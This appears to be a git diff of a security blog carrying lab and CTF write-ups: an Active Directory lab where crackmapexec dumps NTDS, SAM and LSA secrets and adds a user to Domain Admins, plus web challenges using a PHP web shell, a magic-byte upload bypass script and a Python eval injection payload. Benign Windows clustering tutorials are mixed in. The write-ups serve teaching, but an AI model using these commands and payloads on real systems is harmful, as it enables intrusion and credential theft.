NORTH\WINTERFELL$:plain_password_hex:81ba3b085654dc44a1ede7ea006e2330b869f885bb76d6ab9b9bf959a24835a4521407345d840c9e3708abbd8730822260734914769732e031d0fd7c3a3c71438b3da91460cde8ee884c8de619df6c8bf88c7040e1af0b552dd4aa01a9b1ba5cda63d6a11d54d7044f5a14bdd3263812850cb5184a3456c27ef083e7da3fd1143d814beeaa3adabc0a81e53eb0606dc151421cb756eed4c52a108f22f160d18e761642e1f66effc5fdb5ba3e01720c527d05cd1a24a7b8557579980b5757862c82168b0abbbc89aec55414e741e6252a03acd29acea1ae9b5fb933f2fb6ca9e838e0395cb84e19a10b3ffcd3e3409c92 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NORTH\robb.stark:sexywolfy +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL dpapi_machinekey:0x2156559686eeb6fd6e9116a6dbb58d11e61c87b4 +</span></span><span class="line"><span class="cl">dpapi_userkey:0x802f741bb0b27e5f5fef3b7bc549bac02f4fa528 
+</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9 +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.secrets and /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.cached +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec smb 192.168.0.151 -u john -p &#34;H4x00r123..&#34; --ntds +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">SMB 192.168.0.151 
445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e1aa23cbaaed62c05427ff7148c04d8::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:2c643546d00054420505a2bf86d77c47::: 
+</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:1540ceefdcd5c9e64384ea6796bcd3b4::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL krbrelay$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:02f4f0cba0ec04eae62a64df80330594::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumped 20 NTDS hashes to 
/home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_121039.ntds of which 16 were added to the database +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec smb 192.168.0.151 -u john -p &#34;H4x00r123..&#34; --sam +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span><span class="lnt">6 +</span><span class="lnt">7 +</span><span class="lnt">8 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">TERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Dumping SAM hashes +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. 
The account doesn&#39;t have hash information. +</span></span><span class="line"><span class="cl">SMB 192.168.0.151 445 WINTERFELL [+] Added 3 SAM hashes to the database +</span></span><span class="line"><span class="cl"> +</span></span></code></pre></td></tr></table> +</div> +</div><p>We also get another plaintext creds &lsquo;NORTH\robb.stark:sexywolfy&rsquo;</p> +<hr> +<p>Checking this use on Bloodhound we can see that there is a path to domain admin.</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/admin.jpeg" + + + + loading="lazy" + + alt="root" + + +></p> +<p>THe user has generic all , so we can add ourselves to domain admin group</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">net group &#34;Domain Admins&#34; john /add /domain +</span></span></code></pre></td></tr></table> +</div> +</div><p>From here we can login to the domain controller</p> +<p>And we pwn the north :)</p> +<hr> + + + BsidesNrb2024 https://f0rk3b0mb.github.io/p/bsidesnrb2024/ Sat, 26 Oct 2024 17:13:14 +0300 diff --git a/post/page/2/index.html b/post/page/2/index.html index 51326fc..adf470a 100644 --- a/post/page/2/index.html +++ b/post/page/2/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - - diff --git a/post/page/3/index.html b/post/page/3/index.html index c57b16d..d366571 100644 --- a/post/page/3/index.html +++ b/post/page/3/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - - diff --git a/post/page/4/index.html b/post/page/4/index.html index 118ded8..823a4c1 100644 --- a/post/page/4/index.html +++ b/post/page/4/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - - diff --git a/post/page/5/index.html b/post/page/5/index.html index 7cdcd2d..7f0af33 100644 --- a/post/page/5/index.html +++ b/post/page/5/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ + - -
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,23 @@

Posts

+ +
diff --git a/search/index.json b/search/index.json
index 8dc230f..37268d1 100644
--- a/search/index.json
+++ b/search/index.json
@@ -1 +1 @@ -[{"content":"Bsides Nairobi Cyberchallenge 2024 writeup This is a writeup for the web challenges in Bsides Nairobi Cyberchallenge held physically at Strathmore university, Nairobi\nMy team p3rf3ctr00t won , for the second year in a row. :)\nWeb category Mr donor Here we are given a wordpress site. With donation forms.\nSo first things first, i use wpscan to enumerate the site. There isint alot of content.\n1 2 3 4 use this to enumerate the users wpscan --url http://3.85.212.227/ -e u we get one user - admin_magharibi\nFrom the scan we can also see that there is a plugin called \u0026ldquo;give\u0026rdquo; version 3.41.0\nLooking on the internet we can see that it is vulnerable to CVE-2024-5932 so we can achieve code execution.\nI used this exploit \u0026raquo; here\nIn the shell we can see that there are 3 users\nbackup_svc ctfroom ubuntu checking the contents of wp-config.php\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 /** Database username */ define( \u0026#39;DB_USER\u0026#39;, \u0026#39;wordpressuser\u0026#39; ); /** Database password */ define( \u0026#39;DB_PASSWORD\u0026#39;, \u0026#39;roomctfpassword\u0026#39; ); /** Database hostname */ define( \u0026#39;DB_HOST\u0026#39;, \u0026#39;localhost\u0026#39; ); /** Database charset to use in creating database tables. */ define( \u0026#39;DB_CHARSET\u0026#39;, \u0026#39;utf8\u0026#39; ); /** The database collate type. Don\u0026#39;t change this if in doubt. */ define( \u0026#39;DB_COLLATE\u0026#39;, \u0026#39;\u0026#39; ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. 
* * @since 2.6.0 */ define(\u0026#39;AUTH_KEY\u0026#39;, \u0026#39;\u0026amp;p`1\u0026amp;)?\u0026gt;Qk=gl`- GRBr^tuc~=M?CSa^jx *?9Tk`+pj?fndQg{\u0026amp;|~SUtf8+K9FN\u0026#39;); define(\u0026#39;SECURE_AUTH_KEY\u0026#39;, \u0026#39;Okb-xgA4s`znPZ7?gxIdM$)kQFHcvskp\u0026amp; )K67 -YM_rftdk#:0.0B}}q?VaK\u0026lt;z\u0026lt;\u0026#39;); define(\u0026#39;LOGGED_IN_KEY\u0026#39;, \u0026#39;%3$eB%Ne%]s1= `I{5vOs2? EBbn@\u0026amp;{|\u0026gt;.sO?is~XzAN%\u0026lt;O*x-}*k+v}@Xg9RMrD\u0026#39;); define(\u0026#39;NONCE_KEY\u0026#39;, \u0026#39;$#JLk_v+0T6?i)[sJ(Q#f--bsbIO`KS(\u0026gt;}Foz55T|QU-;+L_7sqr{7oEj/m$_.yF\u0026#39;); define(\u0026#39;AUTH_SALT\u0026#39;, \u0026#39;EdGSntZ*0j\u0026gt;pc\u0026lt;^-l^1q`6o^Yf]s|\u0026amp;2BI t|1nwes:i\u0026lt;$jLx*1tJ1~5p)C(}|U-k\u0026#39;); define(\u0026#39;SECURE_AUTH_SALT\u0026#39;, \u0026#39;+O%(gn.H`zB)znBcp^TR#5EjM`(C\u0026gt;\u0026amp;wX|BGD#rJX?v#bU;OLEzdeoD`.c1_i`Svo\u0026#39;); define(\u0026#39;LOGGED_IN_SALT\u0026#39;, \u0026#39;G5x3@)Uw`++abxv sAMrkZtS*`87cfDX\u0026gt;bh-L|SIN!/bZV*^[wC+] nyLP\u0026lt;e6JY]\u0026#39;); define(\u0026#39;NONCE_SALT\u0026#39;, \u0026#39;MXp}(a| 7+TGK9-f2-a9*7@Xv}$6h-N\u0026lt;Z13a@_KlF+|Ugo-3\u0026lt;jHcX\u0026lt;WO[hy?XG ]\u0026#39;); We can login to the database and read the wordpress users and their passwords. 
I found the following hash for admin_magharibi: $P$BHFeuYRoSbViPBhP11FqGR0OQ.6N981.\nI started cracking it in the background while i looked around.\nChecking the crontab\u0026hellip;\n1 0 0 * * 0 sshpass -p \u0026#39;vnG^W6q%zjt^S\u0026#39; ssh -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null backup_svc@127.0.0.1 \u0026#34;cp -R /var/www/wordpress /wp_backup\u0026#34; as you can see teh backup_svc user password is exposed.\nLogin via ssh as backup_svc, checking what the user can run as sudo\u0026hellip;\n1 2 3 4 sudo -l we see that the can run any command as sudo without sudo password We get bash shell ad read the flag\n372ae41683bd87573a4902d1ed2d58ad\nPixel Blunder This challenge gave a web interface with a file upload functionality. Seeing this it should click immediately that we are testing file upload vulnerabilities.\nThe site was checking if the image was valid through the magic bytes.\nSo we need to craft a php shell with png magic bytes.\n1 \u0026lt;?php system($_GET[\u0026#39;cmd\u0026#39;]);?\u0026gt; You can use a full php reverseshell as the payload , i use this since ive mastered it offhead.\nAdd magic bytes at it now identifies as a png, ill leave the python script below for future reference\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import argparse import os def add_hex_to_file(file_path, hex_string, position): # Convert hex string to bytes hex_data = bytes.fromhex(hex_string) # Read the original file content with open(file_path, \u0026#39;rb\u0026#39;) as f: original_content = f.read() # Modify content based on the specified position if position == \u0026#34;start\u0026#34;: modified_content = hex_data + original_content elif position == \u0026#34;end\u0026#34;: modified_content = original_content + hex_data elif position.isdigit(): offset = int(position) modified_content = original_content[:offset] + hex_data + original_content[offset:] else: raise 
ValueError(\u0026#34;Invalid position. Use \u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for custom offset.\u0026#34;) # Write the modified content back to the file with open(file_path, \u0026#39;wb\u0026#39;) as f: f.write(modified_content) print(f\u0026#34;Hex data added to {file_path} at position: {position}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: parser = argparse.ArgumentParser(description=\u0026#34;Add hex data to a file at a specified position.\u0026#34;) parser.add_argument(\u0026#34;file\u0026#34;, help=\u0026#34;Path to the file to modify.\u0026#34;) parser.add_argument(\u0026#34;hex\u0026#34;, help=\u0026#34;Hex string to add.\u0026#34;) parser.add_argument(\u0026#34;position\u0026#34;, help=\u0026#34;Position to add hex data (\u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for a custom offset).\u0026#34;) args = parser.parse_args() if not os.path.isfile(args.file): print(\u0026#34;File not found.\u0026#34;) else: add_hex_to_file(args.file, args.hex, args.position) Uploading the file we still get nothing.\nThere is still one more step\u0026hellip;.\nUploading the file the file-extension is stripped and if you know a php web server , it will not try to parse anyfile that doesnt have the proper php file extension.\nTHe trick for this is to use two extensions so that it strips one and leaves the other like \u0026ldquo;shell.php.php\u0026rdquo;\nWe get a shell and read the /flag.txt\nflag{7512a04d-5acd-45d9-b7ba-89467f2ba4ec}\nFaceoff In this challenge we are given a login page, username and password are admin:admin123 , my team mate got these from wherever.\nI solved this challenge ten minutes to time so i might not explain properly how i did this.\nAfter loggin in with the creds we are provided with a black page. Looking at the backend we can see that it uses flask . TIP: if you ever see flask in the backend most probably there is SSTI. 
So you have to look for user controlled input that is being diplayed in the page.\nThere was a hint for the chal , so i used the word \u0026ldquo;bsides\u0026rdquo; as a parameter\n1 2 http://3.88.113.117/do_something?bsides=\u0026lt;here goes your payload\u0026gt; Trying ssti payloads will give this error\n1 You have said: Error: unhashable type: \u0026#39;set I googled it and saw it was caused by python eval(). So we can get code execution by using the payload below\n1 http://3.88.113.117/do_something?bsides=__import__(\u0026#39;os\u0026#39;).system(\u0026#39;id\u0026#39;) Slap a reverse shell and you are good to go.\nThe flag wa hidden in \u0026ldquo;do_something/secret\u0026rdquo; , this i learnt after reading app.py file. Was lucky to get this 2 minutes before time\nflag: D0nt_4get_to_wear_Y0r_reflective_j4ck37s\n","date":"2024-10-26T17:13:14+03:00","image":"https://f0rk3b0mb.github.io/cover/perfect.png","permalink":"https://f0rk3b0mb.github.io/p/bsidesnrb2024/","title":"BsidesNrb2024"},{"content":"Windows Server High Availability Setup Part2\nCheck out part 1 \u0026raquo; here to be able to proceed to this stage\n1. Windows Server High Availability Setup of Roles Youll need to create a iscsi virtual hard disk through the domain controller and add it to the cluster , that step is in part 1\nMy disk is \u0026ldquo;cluster disk 1\u0026rdquo;\nFor this demonstration im going to make nginx web server application persistent across the nodes. So i copied nginx files to the cluster disk.\nThen create a role with the executable path and parameters start the nginx server\nGo to roles in failover cluster manager applucation and create an empty role. Then add resource in this case is a generic application. You can add services and native processes or even containers of you want those to be persistent.\nThen confirm, ensure the role is up with no errors.\nWith that we have configured nginx to be persistent across nodes. 
If you turn off node 1 it will be started in node 2 with all the data persistent across the nodes.\nFrom there you can setup the networking part of your appplication to ensure they can be accessed from other endpoints.\n","date":"2024-07-01T09:38:06+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster_part2/","title":"Windows_server_high_availability_cluster_part2"},{"content":"Windows Server High Availability Setup\n1 2 A failover cluster is a group of independent computers that work together to increase the availability and scalability of clustered roles (formerly called clustered applications and services). The clustered servers (called nodes) are connected by physical cables and by software. If one or more of the cluster nodes fail, other nodes begin to provide service (a process known as failover). In addition, the clustered roles are proactively monitored to verify that they are working properly. If they are not working, they are restarted or moved to another node. Here we are going to setup iscsi disks and a cluster with 2 node servers.\nThe disk can be physical or virtual , for this tutorial im going to use a virtual harddisk.\nYou will also need:\nvmware workstation 3 windows server operation systems (im using 2022) 1. Install required components We will need the following components:\nFile Server Iscsi Target Server Failover Clustering Active Directory Domain Services 2 setup Domain Controller Create a domain server and add the other 2 vms to the domain\nfollow this tutorials here to do the same \u0026raquo;\nsetup DC\nadd computer to domain\n1 2 3 4 5 6 7 Before you begin you have to set the dns server that can resolve the dc domain name in the network settings. For this instance the dns is the same as the ip of the DC controller. This will enable the other device to access the domain pingpong.local without need of specifying the ip address. 
You will also need to set a static iP address for the domain controller server. 3. Create Iscsi disk 1 iSCSI is an IP-based standard for transferring data that supports host access by carrying SCSI commands over IP networks. 4. Iscsi initialization We now need to initialize the disk on both instances\nUse the ip address we set for the DC to discover the iscsi instance.\nThen connect.\nThen go to windows \u0026ldquo;create and formart disk partition\u0026rdquo; application to initialize the disk.\n5. Setup Cluster We are going to setup the cluster. Make sure you login with domain user account in the nodes. If you dont you will get an error when creating the cluster.\nIm creating the cluster in node 1\nChoose you current computer as the cluster server\nThen add the disk that we had created earlier as storage.\n6. Configure cluster quorum Learn more about this \u0026raquo; here\n7. Connect nodes to Cluster Use same steps as in stage 5 to add a node to the cluster\nYou can do this clicking add node in the cluster that we just created in 5\n8. Test cluster If you shutdown on vm the disk become online on the other and vice versa. The status also changes to down or up depending on which node is up.\nThis is a succesful demonstration of setup of hight availability in windows server. This can be applied to lots of services and real time application. 
The one demonstarted above is high availability for storage device.\n","date":"2024-06-21T14:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster/","title":"Windows_server_high_availability_cluster"},{"content":"Writeup for urchinsec 2024 boot2root challenge This is the writeup for the boot 2 root challenge Bill Systems which i got the second solve.\nThis challneg requires knowledge in:\nrecon persistense lateral movement priviledge escalation Bill Systems categoty: boot2root difficulty: medium\nwe are given:\n1 2 3 SCOPE OF ENGAGEMENT domains : *.billsys.urc IP : 45.79.66.97 First we need to gather more info, so i ran an nmap scan to see open ports\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 9e:cd:9e:38:58:35:4c:24:1a:01:29:0d:9d:26:fe:2b (ECDSA) |_ 256 50:35:25:83:7d:aa:d7:42:43:d4:bb:fa:e8:6c:12:bb (ED25519) 25/tcp filtered smtp 80/tcp open http |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). 
| fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:19 GMT | Content-Length: 0 | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:12 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:13 GMT |_ Content-Length: 0 443/tcp open https? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=7748aed9b1afa3fe; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:13 GMT | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en-US\u0026#34; data-theme=\u0026#34;gitea-auto\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Gitea: Git with a cup of tea\u0026lt;/title\u0026gt; | \u0026lt;link rel=\u0026#34;manifest\u0026#34; href=\u0026#34;data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpem | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, 
no-transform | Set-Cookie: i_like_gitea=e41496a78b8b88ad; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxNDIyMDEyMDUyMzg0MjU2Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:20 GMT |_ Content-Length: 0 3306/tcp open mysql MariaDB (unauthorized) 3333/tcp open nagios-nsca Nagios NSCA 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC50%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202 SF:024\\x2012:15:12\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions, SF:4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012: SF:15:13\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,67,\u0026#34;HTTP/1 SF:\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset SF:=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhF SF:ourRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x20 SF:2024\\x2012:15:19\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(GenericLine SF:s,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain SF:;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request SF:\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te 